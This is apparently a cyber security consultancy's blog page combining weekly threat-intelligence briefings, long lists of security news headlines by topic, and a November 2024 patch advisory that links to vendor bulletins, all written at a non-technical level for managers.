AI-Based Attacks Top Gartner’s List of Emerging Threats – Again | MSSP Alert

Execs identify AI-driven cyber attacks as top security threat | SC Media

Employees are hiding their AI use from their managers. Here's why | ZDNET

HackerOne: 48% of Security Professionals Believe AI Is Risky

Hackers Are Using AI Against You: Here Is How To Protect Yourself

3 key generative AI data privacy and security concerns | TechTarget

80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis

Risk of AI in CIISec survey | Professional Security Magazine

AI Threat to Escalate in 2025, Google Cloud Warns - Infosecurity Magazine

Inside The Duality of AI's Superpowers

Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online

How CISOs Can Lead the Responsible AI Charge

Organisations face mounting pressure to accelerate AI plans, despite lack of ROI | ZDNET

Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes

Artificial intelligence and cyber crime: implications for individuals and the healthcare sector – DataBreaches.Net

How to ward off fraudulent job seekers propped up by AI | SC Media

Sticker shock: Are enterprises growing disillusioned with AI? | ZDNET

Malware

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

ESET shines light on cyber criminal RedLine empire | Computer Weekly

Cyber Criminals Use Excel Exploit to Spread Fileless Remcos RAT Malware

Hackers now use ZIP file concatenation to evade detection

Hackers Abusing Google Ads To Deliver Fakebat Malware

Google Chrome extensions remain a security risk as Manifest V3 fails to prevent data theft and malware exploitation | TechRadar

Sophisticated Infostealers Top Malware Rankings

Hive0145 Targets Europe with Advanced Strela Stealer Campaigns - Infosecurity Magazine

New Glove Stealer malware bypasses Chrome's cookie encryption

This devious new malware is going after macOS users with a whole barrel of tricks | TechRadar

Hello again, FakeBat: popular loader returns after months-long hiatus | Malwarebytes

OpenText reveals 2024 nastiest malware, LockBit leads list

Watch out, that Excel document could be infected with dangerous malware | TechRadar

‘Top 10’ malware strain, Remcos RAT, now exploiting Microsoft Excel files | SC Media

Volt Typhoon rebuilds malware botnet following FBI disruption

North Korean hackers create Flutter apps to bypass macOS security

Malware being delivered by mail, warns Swiss cyber agency

This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar

MacBook Pro Owners Warned As 99 New Security Problems Reported

New Ymir ransomware partners with RustyStealer in attacks

TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine

Bots/Botnets

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

Volt Typhoon rebuilds malware botnet following FBI disruption

Mobile

Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium

To patch a dangerous flaw, Pixel users need to install the November security update ASAP - PhoneArena

iPhones in a law enforcement forensics lab mysteriously rebooted losing their After First Unlock (AFU) state

Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices

6 telltale signs that your Android phone has malware

US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek

NatWest blocks bevy of messenger apps on staff devices • The Register

Google Confirms $1 Trillion AI Security Protection For Pixel Users

This Pixel phone feature listens in on calls to protect you from scams | ZDNET

Denial of Service/DoS/DDoS

Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post

DDoS Attacks Targeting ISPs are Different – Here’s How - Security Boulevard

'Cyber attack' council in Tewkesbury working to ease backlog - BBC News

What will carpet bomb attacks mean for security teams in 2025? - Tech Monitor

Internet of Things – IoT

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

Burglars are jamming Wi-Fi security cameras. Here's what you can do | PCWorld

Unpatched Vulnerabilities Allow Hacking of Mazda Cars: ZDI - SecurityWeek

Data Breaches/Leaks

Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald's, HSBC, HP, and Potentially 1000+ Other Companies | InfoStealers

Here's what we know about the Snowflake data theft suspects • The Register

Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine

Major cyber attacks and data breaches of 2024 - Security Boulevard

Debt Relief Firm Forth Discloses Data Breach Impacting 1.5 Million People - SecurityWeek

200,000 SelectBlinds customers have their cards skimmed in malware attack

Not to alarm you, but your Social Security number is already leaked | The Independent

300,000 Patients Impacted By Law Firm Data Breach

Business records on 100M+ people swiped, put up for sale • The Register

Leaked info of 122 million linked to B2B data aggregator breach

Another major US healthcare organisation has been hacked, with potentially major consequences | TechRadar

Embargo ransomware claims breach of US pharmacy network • The Register

Misconfigured Microsoft Power Pages could lead to data breaches

IT specialist Jack Teixeira jailed for 15 years after leaking classified military documents on Discord

HIBP notifies 57 million people of Hot Topic data breach

Organised Crime & Criminal Actors

Scattered Spider, BlackCat criminals claw back • The Register

US Prison Sentences for Nigerian Cyber Criminals Surge in Recent Months - SecurityWeek

How Global Threat Actors May Respond to a Second Trump Term

Here's what we know about the Snowflake data theft suspects • The Register

ESET shines light on cyber criminal RedLine empire | Computer Weekly

Crypto CEO safe after being kidnapped and held for $1 million ransom  | Fortune Crypto

Charges Unsealed for Alleged Hackers of Snowflake Customers

World Economic Forum calls for joint efforts to counter cyber threats - World - DAWN.COM

WEF Launches New Framework to Combat Cyber Crime - Infosecurity Magazine

Cyber crook devoid of boundaries gets 10-year prison stint • The Register

Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin

What To Know About Cyber Criminal Ross Ulbricht And His Possible Release Under Trump

The spatiotemporal patterns and driving factors of cyber crime in the UK during the COVID-19 pandemic | Humanities and Social Sciences Communications

The UK will work with international partners to dismantle the cyber criminal ecosystem: UK statement at the UN Security Council - GOV.UK

FBI Warns US Organisations of Fake Emergency Data Requests Made by Cyber Criminals - SecurityWeek

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering

Criminal crypto launderer gets 12.5 years in prison • The Register

Crypto CEO safe after being kidnapped and held for $1 million ransom | Fortune Crypto

Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin

Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes

Insider Risk and Insider Threats

IT specialist Jack Teixeira jailed for 15 years after leaking classified military documents on Discord

Guardsman gets 15 years after leaking secret info on Discord • The Register

Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert

Insurance

Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers

Supply Chain and Third Parties

BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy

NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net

Millions of records from MOVEit hack released on dark web | SC Media

Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine

Single points of failure breed systemic risk to national security | SC Media

300,000 Patients Impacted By Law Firm Data Breach

Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine

Cloud/SaaS

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

5 Ways to Save Your Organisation From Cloud Security Threats

Strategies for CISOs navigating hybrid and multi-cloud security - Help Net Security

Outages

Single points of failure breed systemic risk to national security | SC Media

Microsoft investigates OneDrive issue causing macOS app freezes

Identity and Access Management

Identity Security Is The Cornerstone Of Modern Cyber Defence

Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks

Embracing The Future Of Cryptography And Identity Management

Encryption

Quantum cyber risk – securing tomorrow | BCS

Embracing The Future Of Cryptography And Identity Management

Linux and Open Source

Open Source Security Incidents Aren't Going Away

Passwords, Credential Stuffing & Brute Force Attacks

Here Are the Top 10 Passwords for 2024, and They're All Embarrassing - CNET

The true (and surprising) cost of forgotten passwords

Social Media

TikTok Pixel Privacy Nightmare: A New Case Study

Instagram purportedly subjected to widespread data scraping | SC Media

South Korea Fines Meta $15.7 Million For Collecting User Data - IT Security Guru

Malvertising

Hackers Abusing Google Ads To Deliver Fakebat Malware

Training, Education and Awareness

48% of small businesses don’t offer cyber security training

Cyber Security Education Needs a Team: Better Partner Up!

Regulations, Fines and Legislation

BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy

CISOs in 2025: Balancing security, compliance, and accountability - Help Net Security

Preparing for DORA Amidst Technical Controls Ambiguity

GDPR landscape | Professional Security Magazine

More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED

How the Trump Administration May Reshape Security, Privacy

US doubles down support for UN cyber crime treaty | SC Media

The UN cyber crime convention threatens security research. The US should do something about it | CyberScoop

Will cyber suffer under Trump’s goal to slash federal budgets? - Government Executive

HISAA: New Legislation Would Bring Cyber Security Requirements for HIPAA Covered Entities and Business Associates | Epstein Becker & Green - JDSupra

Why Future-proofing Cyber Security Regulatory Frameworks Is Essential

Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine

Ambitious cyber security regulations leave companies in compliance chaos - Help Net Security

Rand Paul says he wants to eliminate cyber security agency but will likely reorganise it instead | Just The News

Washington's Cyber Security Storm of Complacency

Models, Frameworks and Standards

Preparing for DORA Amidst Technical Controls Ambiguity

NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net

GDPR landscape | Professional Security Magazine

HISAA: New Legislation Would Bring Cyber Security Requirements for HIPAA Covered Entities and Business Associates | Epstein Becker & Green - JDSupra

NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely

Data Protection

South Korea Fines Meta $15.7 Million For Collecting User Data - IT Security Guru

Careers, Working in Cyber and Information Security

Cyber security jobs are paying better than ever right now — but there are still some major issues | TechRadar

Veterans’ military skills can help them fill cyber vacancies, State official says - Nextgov/FCW

Has the Cyber Security Workforce Peaked?

4 reasons why veterans thrive as cyber security professionals - Help Net Security

How Generative AI Will Change Jobs In Cyber Security

Tips for a successful cyber security job interview - Help Net Security

Law Enforcement Action and Take Downs

Scattered Spider, BlackCat criminals claw back • The Register

Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering

Here's what we know about the Snowflake data theft suspects • The Register

iPhones Seized by Cops Are Rebooting, and No One’s Sure Why

Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica

Charges Unsealed for Alleged Hackers of Snowflake Customers

Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices

New iOS Security Feature Reboots Devices to Protect User Data: Reports - SecurityWeek

Cyber crook devoid of boundaries gets 10-year prison stint • The Register

Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin

IT specialist Jack Teixeira jailed for 15 years after leaking classified military documents on Discord

The UK will work with international partners to dismantle the cyber criminal ecosystem: UK statement at the UN Security Council - GOV.UK

Misinformation, Disinformation and Propaganda

German interior minister warns of cyber threat ahead of elections


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

China’s Hacker Army Outshines America | Miami Herald

CISA, FBI Confirm China Hacked Telecoms Providers for Spying - SecurityWeek

Massive Telecom Hack Exposes US Officials to Chinese Espionage - Infosecurity Magazine

China-linked hackers stole surveillance data from telecom companies, US says | Reuters

Toolkit Vastly Expands APT41's Surveillance Powers

Nation State Actors

China

China’s Hacker Army Outshines America | Miami Herald

Chinese hacking effort is far more pervasive than previously reported, sources say - ABC News

US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek

Volt Typhoon rebuilds malware botnet following FBI disruption

CISA, FBI Confirm China Hacked Telecoms Providers for Spying - SecurityWeek

Massive Telecom Hack Exposes US Officials to Chinese Espionage - Infosecurity Magazine

Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations | Trend Micro (US)

Toolkit Vastly Expands APT41's Surveillance Powers

TikTok Pixel Privacy Nightmare: A New Case Study

Russia

How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) - Help Net Security

Windows Zero-Day Exploited by Russia Triggered With File Drag-and-Drop, Delete Actions - SecurityWeek

German interior minister warns of cyber threat ahead of elections

Households should keep enough cash on hand for three days, BoF says | Yle News | Yle

Pro-Russia Hackers Ramp Up Cyber Attacks on South Korea, Presidential Office Says - The Moscow Times

Iran

Adversarial advantage: Using nation-state threat analysis to strengthen US cyber security

TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine

Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post

North Korea

North Korean hackers create Flutter apps to bypass macOS security

Lazarus Group Uses Extended Attributes for Code Smuggling in macOS - Infosecurity Magazine

Pro-Russian Groups Target South Korea as North Korea Joins Ukraine - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

1,400 Pegasus spyware infections detailed in WhatsApp’s lawsuit filings

More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED

How Italy became an unexpected spyware hub


Tools and Controls

48% of small businesses don’t offer cyber security training

Failed security controls cost businesses billions

The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard

Identity Security Is The Cornerstone Of Modern Cyber Defence

Steps Organisations Can Take to Improve Cyber Resilience - Security Boulevard

How cyber security failures are draining business budgets - Help Net Security

Maximizing cyber security ROI: Best practices for CISOs today | TechRadar

API Security in Peril as 83% of Firms Suffer Incidents - Infosecurity Magazine

Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks

Improve Your Organisation’s Data Security Posture - IT Security Guru

New iOS Security Feature Reboots Devices to Protect User Data: Reports - SecurityWeek

Cyber security network to make the UK safer and more resilient – UKRI

How Generative AI Will Change Jobs In Cyber Security

The ROI of Security Investments: How Cyber Security Leaders Prove It

Leveraging Threat Intelligence Feeds for Proactive Cyber Defence

80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis

Embracing The Future Of Cryptography And Identity Management

Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert

Experts Uncover 70,000 Hijacked Domains in Widespread 'Sitting Ducks' Attack Scheme

How Developers Drive Security Professionals Crazy

EU Ramps Up Cyber Resilience with Major Crisis Simulation Exercise - Infosecurity Magazine

Adversarial advantage: Using nation-state threat analysis to strengthen US cyber security

Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online

The UN cyber crime convention threatens security research. The US should do something about it | CyberScoop

Dependency Management is Critical for Disaster Recovery After a Security Incident | HackerNoon

5 BCDR Oversights That Leave You Exposed to Ransomware

Half of businesses now using AI for cyber security | theHRD

Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine

O2’s AI Granny Outsmarts Scam Callers with Knitting Tales - Infosecurity Magazine

This Pixel phone feature listens in on calls to protect you from scams | ZDNET



Vulnerability Management

Zero-days dominate top frequently exploited vulnerabilities - Help Net Security

Five Eyes nations reveal the top 15 most exploited flaws • The Register

NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely

NCSC on cyber threat landscape | Professional Security Magazine

Outdated PCs are Holes in Your Cyber Security Armor | Dell USA

Vulnerabilities

Microsoft Patch Tuesday security updates for November 2024 fix two actively exploited zero-days

HPE Patches Critical Vulnerabilities in Aruba Access Points - SecurityWeek

Veeam Patches High-Severity Vulnerability as Exploitation of Previous Flaw Expands - SecurityWeek

Patch Tuesday: Critical Flaws in Adobe Commerce, Photoshop, InDesign, Illustrator - SecurityWeek

Citrix Issues Patches for Zero-Day Recording Manager Bugs

Exploit code released for RCE attack on Citrix VDI solution • The Register

Palo Alto Advises Securing PAN-OS Interface Amid Potential RCE Threat Concerns

Critical Veeam RCE bug now used in Frag ransomware attacks

Fortinet Releases Security Updates for Multiple Products | CISA

Ivanti Patches 50 Vulnerabilities Across Several Products - SecurityWeek

High-Severity Vulnerabilities Patched in Zoom, Chrome - SecurityWeek

Citrix, Fortinet Patch High-Severity Vulnerabilities - SecurityWeek

WordPress Security Plugin Vulnerability Endangers 4 Million+ Sites

High-severity Fortinet VPN flaw allows privilege escalation • The Register

CISA Flags Two Actively Exploited Palo Alto Flaws; New RCE Attack Confirmed

D-Link won’t fix critical flaw affecting 60,000 older NAS devices

Google Chrome Warning—New Drive-By Cyber Attack, No 0-Day Needed

Chipmaker Patch Tuesday: Intel Publishes 44 and AMD Publishes 8 New Advisories - SecurityWeek

High-Severity Flaw in PostgreSQL Allows Hackers to Exploit Environment Variables

Unpatched Flaw in Legacy D-Link NAS Devices Exploited Days After Disclosure - SecurityWeek

D-Link won’t fix critical bug in 60,000 exposed EoL modems

To patch a dangerous flaw, Pixel users need to install the November security update ASAP - PhoneArena


Sector Specific

Industry-specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness only; linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Advisory 13 November 2024 – Microsoft, Ivanti, Adobe, Fortinet, Citrix, AMD, Intel, Chrome and Zoom Security Updates

Executive summary

Alongside Microsoft's November Patch Tuesday, several vendors—including Ivanti, Adobe, Fortinet, Citrix, Intel, AMD, Google, and Zoom—have released security updates to address vulnerabilities across their product ranges. Microsoft's updates rectify 91 security issues, including four zero-day vulnerabilities, with two actively being exploited. Ivanti has issued updates for Endpoint Manager, Avalanche, Connect Secure, and Security Access Client, addressing multiple vulnerabilities rated as 'critical', 'high', and 'medium'. Adobe's patches tackle 48 security issues affecting Commerce, InDesign, Photoshop, Illustrator, and Substance 3D Painter. Fortinet has released updates for several products, including FortiOS, to remediate 'high' rated vulnerabilities. Citrix has provided security updates for various products such as Virtual Apps, Desktops, and Netscaler. Intel has issued 44 security advisories covering a variety of products. AMD has released eight advisories relating to incorrect default permissions in various software utilities. Lastly, Google has updated Chrome, and Zoom has released updates, both addressing multiple 'high' severity security issues.

What’s the risk to me or my business?

The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisation’s data on the affected systems.

What can I do?

Black Arrow recommends applying the available security updates for all supported versions of products that have been impacted by the various vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and for all other vulnerabilities that have a critical or high severity rating.

Microsoft

Further details on specific updates within this Microsoft Patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov

Ivanti

Further details on specific updates across affected Ivanti products can be found here:

https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2024-for-EPM-2024-and-EPM-2022?language=en_US&_gl=1*pchng3*_gcl_au*ODM2NTAyMzg1LjE3MjY2NjkwMTg

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Avalanche-Multiple-CVEs-Q4-2024-Release?language=en_US&_gl=1*pchng3*_gcl_au*ODM2NTAyMzg1LjE3MjY2NjkwMTg

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs?language=en_US&_gl=1*6ap9xw*_gcl_au*ODM2NTAyMzg1LjE3MjY2NjkwMTg

Adobe

Further details of the vulnerabilities in affected Adobe products can be found here under ‘Recent bulletins and advisories’:

https://helpx.adobe.com/security/security-bulletin.html

Fortinet

Further details of the vulnerabilities in affected Fortinet products can be found here:

https://www.fortiguard.com/psirt/FG-IR-23-396

https://www.fortiguard.com/psirt/FG-IR-23-475

https://www.fortiguard.com/psirt/FG-IR-24-144

https://www.fortiguard.com/psirt/FG-IR-24-199

Citrix

Further details of the vulnerabilities in affected Citrix products can be found here:

https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US

https://support.citrix.com/s/article/CTX691608-netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20248534-and-cve20248535?language=en_US

Intel

Further details of the vulnerabilities in affected Intel products can be found here:

https://www.intel.com/content/www/us/en/security-center/default.html

AMD

Further details of the vulnerabilities in affected AMD products can be found here:

https://www.amd.com/en/resources/product-security.html

Chrome

Further details of the vulnerabilities in Google Chrome can be found here:

https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop_12.html

Zoom

Further details of the vulnerabilities in Zoom can be found here:

https://www.zoom.com/en/trust/security-bulletin/?cms_guid=false&lang=en-US

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 08 November 2024

Black Arrow Cyber Threat Intelligence Briefing 08 November 2024:

-Fake Copyright Infringement Emails Spread Rhadamanthys Malware

-Use Public Wi-Fi? You Might Not Want to After You Read This

-New MacOS Malware Linked to North Korean Hackers

-Disaster Recovery Planning is Key in the Modern-Day Business Environment

-The Biggest Underestimated Security Threat of Today? Advanced Persistent Teenagers

-Ransomware Attacks Hit Record Levels in 2024 Despite Law Enforcement Crackdowns

-The West Must Respond to Russia’s Rapidly Escalating Hybrid Warfare

-China’s Elite Hackers Expand Target List to European Union

-How Early-Stage Companies Can Go Beyond Cyber Security Basics

-How AI Will Shape the Next Generation of Cyber Threats

-Cyber Security Trends and Tips for Small and Medium Businesses to Stay Protected

-What are the key Threats to Global National Security?

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Fake Copyright Infringement Emails Spread Rhadamanthys Malware

Check Point Research has identified a widespread phishing campaign targeting hundreds of organisations globally with fake copyright infringement emails. These emails deploy Rhadamanthys, a sophisticated cyber security threat that steals sensitive data, including cryptocurrency wallet information. The attackers impersonate brands mainly from the technology and media sectors, with nearly 70% of fake emails appearing to come from these industries. They exploit fears of copyright violation to prompt downloads of malicious files. The malware uses advanced techniques, such as embedding itself in large files to evade detection. Organisations are advised to strengthen phishing defences and monitor for unusual file downloads to mitigate this risk.

Use Public Wi-Fi? You Might Not Want to After You Read This

A recent survey found that nearly half of internet users connect to public Wi-Fi networks without verifying their legitimacy, with one in four experiencing security issues as a result. Cyber criminals exploit these unsecured networks to steal sensitive data like passwords and banking information. Experts highlight that despite warnings, convenience often outweighs caution, putting both individuals and organisations at risk of data breaches and identity theft. The report underscores the need for businesses to educate employees on the dangers of public Wi-Fi and to adopt secure practices such as using VPNs to protect sensitive information.

New MacOS Malware Linked to North Korean Hackers

Security researchers have identified new macOS malware linked to a North Korean hacking group targeting cryptocurrency businesses. The malware, named "Hidden Risk", is distributed through phishing emails masquerading as cryptocurrency news articles. Recipients are tricked into downloading a malicious program that runs on both Intel and Apple silicon Macs. The program was mistakenly notarised by Apple, allowing it to bypass security measures, but this approval has since been revoked. The malware creates a backdoor into the system, enabling hackers to execute commands and install additional payloads. The campaign is believed to have started in July and is attributed to the BlueNoroff group.

Disaster Recovery Planning is Key in the Modern-Day Business Environment

A recent survey has found that 78% of senior IT professionals reported data loss due to system failure, human error, or cyber attack in the past year, highlighting that protective measures are often breached. Yet only 54% are confident in their ability to recover data and minimise downtime after a disaster. Nearly 40% cite a lack of in-house technical expertise, 29% point to insufficient investment, and 28% note a lack of senior support as barriers to recovery planning. With incidents including a recent global outage costing businesses up to $1.5 billion, prioritising disaster recovery planning is critical for organisational resilience.

The Biggest Underestimated Security Threat of Today? Advanced Persistent Teenagers

Security experts have identified that financially motivated teenage hackers, termed "advanced persistent teenagers", are emerging as a significant cyber security threat. Organisations have suffered major data breaches and paid substantial ransoms due to these attacks, which often exploit social engineering tactics like phishing emails and impersonating helpdesk staff. Despite their youth, these hackers demonstrate capabilities once limited to nation states. Experts emphasise that insider threats and identity-related vulnerabilities are now among the biggest concerns, highlighting the need for improved identity and access management and a better understanding of the human element in cyber security.

Ransomware Attacks Hit Record Levels in 2024 Despite Law Enforcement Crackdowns

A cyber security expert noted that this year saw four eight-figure payments due to successful ransomware attacks, including a $22 million payment by a major health tech company. Data-theft-only attacks have risen by 30%, as some threat actors decide not to encrypt their victims’ systems and instead focus only on data theft. While authorities have disrupted significant ransomware operations, active groups have increased by 30% year-over-year, with 31 new groups emerging. There is a growing debate on banning ransom payments to deter these escalating cyber attacks.

The West Must Respond to Russia’s Rapidly Escalating Hybrid Warfare

Recent reports reveal that Russia is intensifying its hybrid warfare against the West. NATO Secretary General Mark Rutte highlighted a surge in cyber attacks, disinformation campaigns, and industrial sabotage across allied territories. These threats have expanded beyond Ukraine, affecting Western Europe and even the Arctic region. Despite reduced reliance on Russian energy, several EU countries remain vulnerable due to ongoing dependencies. The Kremlin is also exploiting non-traditional media and supporting populist movements to destabilise democracies. This escalating situation underscores the urgent need for Western governments and security services to collaborate in countering these multifaceted threats.

China’s Elite Hackers Expand Target List to European Union

Cyber security software provider ESET reports that China's elite government-backed hackers are expanding their targets to include the European Union. The report highlights that groups like MirrorFace, traditionally focused on Japan, are now targeting EU organisations. Despite this shift, motivations may remain Japan-centric, as spearphishing emails relate to events like EXPO 2025 in Osaka. The use of legitimate tools such as SoftEther VPN by these hackers is a growing concern, allowing them to blend into normal network traffic. ESET advises organisations to treat unexpected deployments of such tools as suspicious, emphasising the need for heightened vigilance.

How Early-Stage Companies Can Go Beyond Cyber Security Basics

Businesses are confronting increasingly sophisticated cyber threats, with phishing scams, zero-day vulnerabilities, and ransomware attacks on the rise. While compliance frameworks like GDPR and PCI DSS provide a foundation, they are insufficient alone as they may not keep pace with evolving cyber criminal tactics. Many organisations risk a false sense of security by focusing solely on compliance, often engaging in procedural tick-box exercises rather than enhancing their security posture. To mitigate risks, organisations must adopt proactive, dynamic, risk-based security strategies, including layered defences, employee training, and robust incident response plans.

How AI Will Shape the Next Generation of Cyber Threats

Advancements in AI are significantly lowering the barrier to entry for cyber attackers. As AI-powered attack tools become accessible and packaged as user-friendly products on the dark web, even those without technical expertise can launch sophisticated cyber attacks. This shift greatly widens the pool of potential attackers beyond traditional threats, and highlights that organisations must adopt AI-powered defences to stay ahead. Ethical concerns also arise in deploying AI for cyber security, especially regarding data privacy and automated responses. Over the next five to ten years, AI-driven threats are expected to evolve significantly, introducing entirely new types of attacks.

Cyber Security Trends and Tips for Small and Medium Businesses to Stay Protected

Microsoft highlights that cyber attacks are increasingly affecting SMBs, with 31% having experienced incidents like ransomware and phishing. These attacks cost SMBs up to $7 million, impacting finances and reputation. 94% recognise cyber security’s importance, and over 70% work with specialists to manage their security. AI’s rise increases security needs, with 81% of SMBs acknowledging this. Many SMBs plan to boost cyber security spending; hybrid work also poses challenges, with 68% finding secure data access difficult for remote workers.

What are the key Threats to Global National Security?

A recent analysis identifies cyber security threats as the foremost concern for nations leveraging digital technologies, with cyber attacks increasingly targeting critical infrastructure. Climate change is another pressing issue, causing resource shortages and contributing to conflicts, with over two in five regions facing climate-induced migration. Bioterrorism also poses significant risks, yet nearly a third of countries have not invested adequately in public health preparedness. Economic espionage is impacting key sectors like technology and defence, and the ongoing threat of nuclear proliferation remains a major global security challenge.

Sources:

https://www.darkreading.com/cyberattacks-data-breaches/fake-copyright-infringement-emails-rhadamanthys

https://inews.co.uk/inews-lifestyle/public-wifi-wont-want-to-read-3348687

https://uk.pcmag.com/security/155250/new-macos-malware-linked-to-north-korean-hackers

https://networkingplus.co.uk/opinion-details?itemid=6441&post=disaster-recovery-planning-is-key-in-the-modern-day-business-environment-568673

https://techcrunch.com/2024/11/01/the-biggest-underestimated-security-threat-of-today-advanced-persistent-teenagers/

https://www.techspot.com/news/105399-ransomware-attacks-set-rise-record-levels-2024-despite.html

https://www.atlanticcouncil.org/blogs/ukrainealert/the-west-must-respond-to-russias-rapidly-escalating-hybrid-warfare/

https://cyberscoop.com/china-apt-eset-target-typhoon-mirrorface/

https://cyberscoop.com/cybersecurity-for-startups-early-stage-companies/

https://www.helpnetsecurity.com/2024/11/07/buzz-hillestad-prismatic-ai-driven-attacks/

https://www.microsoft.com/en-us/security/blog/2024/10/31/7-cybersecurity-trends-and-tips-for-small-and-medium-businesses-to-stay-protected/

https://www.itsecurityguru.org/2024/11/01/what-are-the-key-threats-to-global-national-security/



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware attacks set to rise to record levels in 2024 despite law enforcement crackdowns | TechSpot

Cyber insurers would not welcome ban on ransomware payments :: Insurance Day

GoZone ransomware accuses and threatens victims - Help Net Security

RansomHub dethrones LockBit as top ransomware cartel | Cybernews

Iranian Threat Actors Ramp Up Ransomware, Cyber Activity

Ransomware attacks caused prolonged disruptions in October | TechTarget

Police Doxing of Criminals Raising Ransomware-Attack Stakes

Meet Interlock — The new ransomware targeting FreeBSD servers

Cyber attack disrupts classes at Irish technology university

Ransomware Victims

Devon school 'blackmailed' by hackers in cyber-attack - BBC News

Schneider Electric attackers demand ransom paid in baguettes • The Register

Ransomware Group Demands Payment in French Baguettes

Ransomware Attack Disrupts Georgia Hospital's Access to Health Records - SecurityWeek

Hacker Claims to Leak Nokia Source Code - InfoRiskToday

California court suffering from tech outages after cyber attack

Ransomware attack costs Microchip Technology over $21M | SC Media

Phishing & Email Based Attacks

Businesses Worldwide Targeted in Large-Scale ChatGPT Phishing Campaign - SecurityWeek

Dangerous new phishing campaign infects Windows devices with malicious Linux VM | TechRadar

Beware of phishing emails delivering backdoored Linux VMs! - Help Net Security

Fake Copyright Infringement Emails Spread Rhadamanthys

